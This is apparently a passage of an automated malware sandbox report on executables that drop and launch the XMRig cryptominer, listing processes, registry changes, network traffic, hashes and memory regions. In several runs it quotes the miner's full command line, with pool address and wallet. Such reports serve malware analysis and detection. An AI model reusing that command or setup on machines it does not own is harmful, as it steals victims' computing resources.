memory/4596-59-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-60-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-61-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-62-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-63-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-64-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-65-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-66-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-67-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-68-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-69-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-70-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-71-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-72-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-73-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-74-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-75-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-76-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-77-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-78-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-79-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-80-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-81-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
memory/4596-82-0x00007FF66E820000-0x00007FF66F323000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:43
Platform
win10v2004-20240508-en
Max time kernel
1579s
Max time network
1591s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:41
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5104 wrote to memory of 2256 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5104 wrote to memory of 2256 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| BE | 2.17.107.114:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2256-14-0x00000202B9A50000-0x00000202B9A70000-memory.dmp
memory/2256-15-0x00000202B9AA0000-0x00000202B9AC0000-memory.dmp
memory/2256-16-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-18-0x00000202B9AC0000-0x00000202B9AE0000-memory.dmp
memory/2256-17-0x00000202B9AE0000-0x00000202B9B00000-memory.dmp
memory/2256-19-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-20-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-23-0x00000202B9AC0000-0x00000202B9AE0000-memory.dmp
memory/2256-22-0x00000202B9AE0000-0x00000202B9B00000-memory.dmp
memory/2256-21-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-24-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-25-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-26-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-27-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-28-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-29-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-30-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-31-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-32-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-33-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-34-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-35-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-36-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-37-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-38-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-39-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-40-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-41-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-42-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-43-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-44-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-45-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-46-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-47-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-48-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-49-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-50-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-51-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-52-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-53-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-54-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-55-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-56-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-57-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-58-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-59-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-60-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-61-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-62-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-63-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-64-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-65-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-66-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-67-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-68-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-69-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-70-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-71-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-72-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-73-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-74-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-75-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-76-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-77-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-78-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-79-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-80-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-81-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
memory/2256-82-0x00007FF7B1BE0000-0x00007FF7B26E3000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:42
Platform
win10v2004-20240611-en
Max time kernel
1794s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1124 wrote to memory of 640 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1124 wrote to memory of 640 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4236,i,1400471177590024469,587385956640537806,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4044,i,1400471177590024469,587385956640537806,262144 --variations-seed-version --mojo-platform-channel-handle=4240 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 85.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| BE | 88.221.83.232:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.83.221.88.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/640-14-0x0000024E81E40000-0x0000024E81E60000-memory.dmp
memory/640-15-0x0000024E81E90000-0x0000024E81EB0000-memory.dmp
memory/640-16-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-17-0x0000024E81ED0000-0x0000024E81EF0000-memory.dmp
memory/640-18-0x0000024E81EB0000-0x0000024E81ED0000-memory.dmp
memory/640-19-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-20-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-23-0x0000024E81EB0000-0x0000024E81ED0000-memory.dmp
memory/640-22-0x0000024E81ED0000-0x0000024E81EF0000-memory.dmp
memory/640-21-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-24-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-25-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-26-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-27-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-28-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-29-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-30-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
memory/640-31-0x00007FF60EFE0000-0x00007FF60FAE3000-memory.dmp
